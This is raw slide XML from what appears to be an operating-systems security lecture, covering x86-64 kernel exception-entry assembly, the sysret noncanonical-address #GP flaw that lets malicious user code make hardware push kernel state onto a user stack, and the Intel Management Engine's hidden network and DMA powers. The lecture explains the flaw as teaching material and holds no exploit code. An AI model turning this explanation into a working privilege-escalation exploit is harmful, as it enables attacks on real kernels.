                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>swapgs</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change %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to the top of the kernel task stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>swapgs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:(8),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addq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $PROCSTACK_SIZE, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp</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copy data from CPU stack to kernel task stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">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- 8)  // %ss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">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- 16) //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- 24) // %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rflags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- 32) // %cs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">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- 40) // %rip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">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- 48) // error code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">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- 56) // interrupt number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exception_entry_finish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    // complete `struct </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pushq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> %fs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pushq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> %r15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    ...etc...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15734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6.25E-7 -1.85185E-6 L -0.0026 -0.96481 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-130" y="-48241"/>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0026 -0.96481 L -0.00352 -1.40532 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-52" y="-2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x86</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B6AA6E48-3374-44CE-B8E1-6BCED5C17D8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008646" y="685795"/>
            <a:ext cx="10647946" cy="3410581"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#GP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> happens, the privilege level will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hardware will check the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#GP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-time privilege level, see that it’s 0, and thus assume that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> already points to a kernel stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, the hardware will try to push the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#GP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exception state (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rflags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%rip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) onto the current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, as if a normal nested exception were occurring . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. . . but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the user-mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>stack!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if malicious user code sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to noncanonical addresses before invoking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Left Bracket 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1EA6FCA-E642-4618-AA91-E13B3470DBEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8125331"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5"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880FD9D-1740-47C5-863D-620352CE1C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4936958" y="4501442"/>
            <a:ext cx="4026570" cy="1657335"/>
            <a:chOff x="7776411" y="4501442"/>
            <a:chExt cx="4026570" cy="1657335"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{554EEBB1-469D-4388-B726-9F692BF1ED88}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7776411"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4"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F891DC11-920F-44F2-B579-D0DDACCBC30D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9348550" y="4507834"/>
            <a:ext cx="2418348" cy="1641547"/>
            <a:chOff x="4872791" y="4507834"/>
            <a:chExt cx="2418348" cy="1641547"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="35" name="Straight Arrow Connector 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFEF4B5C-0992-47A5-84BB-720B9047A2E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="13" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="6081964"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6B7CF5C-613A-4CD4-8154-7D1515FF00DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4872791" y="4936193"/>
              <a:ext cx="2418348" cy="1213188"/>
              <a:chOff x="4872791" y="4936193"/>
              <a:chExt cx="2418348" cy="1213188"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="15" name="Group 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C4F192A-034B-460F-B843-E60EF222EAB3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4872791" y="4936193"/>
                <a:ext cx="2418348" cy="872902"/>
                <a:chOff x="3068051" y="4069921"/>
                <a:chExt cx="2418348" cy="872902"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="TextBox 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8362D3-A49B-4E7B-926B-76AE25B9A4F2}"/>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14" name="TextBox 13">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A4CD50C-61A0-43A7-A8EC-F3BB241C14A0}"/>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41" name="TextBox 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9A04865-6BF5-478D-B5DB-50BE1C917C7E}"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Oval 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FCE6134-F0B6-4CD0-BDB7-1D285F29E940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6689552" y="4211409"/>
            <a:ext cx="548640" cy="5486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D705F41-1411-4A10-9EE0-B5EFB0D423C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="316208" y="4022014"/>
            <a:ext cx="6653680" cy="73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EBB4AD-A9EC-4848-93E8-157837E72179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320625" y="897146"/>
            <a:ext cx="730377" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">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766E88-830C-40F9-85C2-EEB837035175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="344689" y="885114"/>
            <a:ext cx="0" cy="3145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FD2C2BC-CFE3-420D-AD11-56DA3B61F7A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6963872" y="4008424"/>
            <a:ext cx="0" cy="199556"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="444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37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fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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D5B8-00AA-4BB1-8A59-DBFDA265FC40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410687" y="79375"/>
            <a:ext cx="6785758" cy="812165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intel Chips Post-2006</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C00DAD85-489C-4C9D-BF10-F83D978662AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91440" y="891540"/>
            <a:ext cx="7075170" cy="5966460"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The Management Engine (ME) is an x86-32 processor that’s co-located    with a machine’s normal x86-64 cores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ME core runs MINIX OS and a web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>If a machine is plugged into a wall socket, then the ME core is always running, even if the rest of the hardware is off or sleeping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ME core has DMA privileges for all of RAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ME core can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Send and receive Ethernet packets that the host OS never sees</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Prevent the OS from seeing packets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B4B86BA-2583-4213-989A-1308925B199C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8095084" y="275081"/>
            <a:ext cx="3363734" cy="6532129"/>
            <a:chOff x="8095084" y="275081"/>
            <a:chExt cx="3363734" cy="6532129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C070ED86-C4D3-4519-ADAD-D423BDAD622A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8105173" y="3757077"/>
              <a:ext cx="3353645" cy="2249914"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{052D8D46-73A0-4D5E-9400-DCEC203AF9AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8095084" y="275081"/>
              <a:ext cx="3362206" cy="3368324"/>
              <a:chOff x="8095084" y="103631"/>
              <a:chExt cx="3362206" cy="3368324"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Picture 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{768C4499-1040-4999-9DC2-147276FD5045}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8095084" y="103631"/>
                <a:ext cx="3362206" cy="2537327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="TextBox 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6E25DE1-9822-4A48-A6C8-C67C19BAA9B5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8103645" y="2640958"/>
                <a:ext cx="3353645" cy="830997"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2300" b="1" dirty="0">
                    <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Example ME Core:</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2300" b="1" dirty="0">
                    <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Intel Q35</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD575E61-13B5-4852-B4B4-1BCDC51A9245}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8103645" y="6006991"/>
              <a:ext cx="3353645" cy="800219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2300" b="1" dirty="0">
                  <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Example Flash chip used to store ME code</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E96640CA-2221-49BB-A476-1376F8B760CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>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FBF170C8-1C2B-4231-BCED-7F7DF05DCED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CAB9BA4-37B7-48D6-A053-302A85CFAFB3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
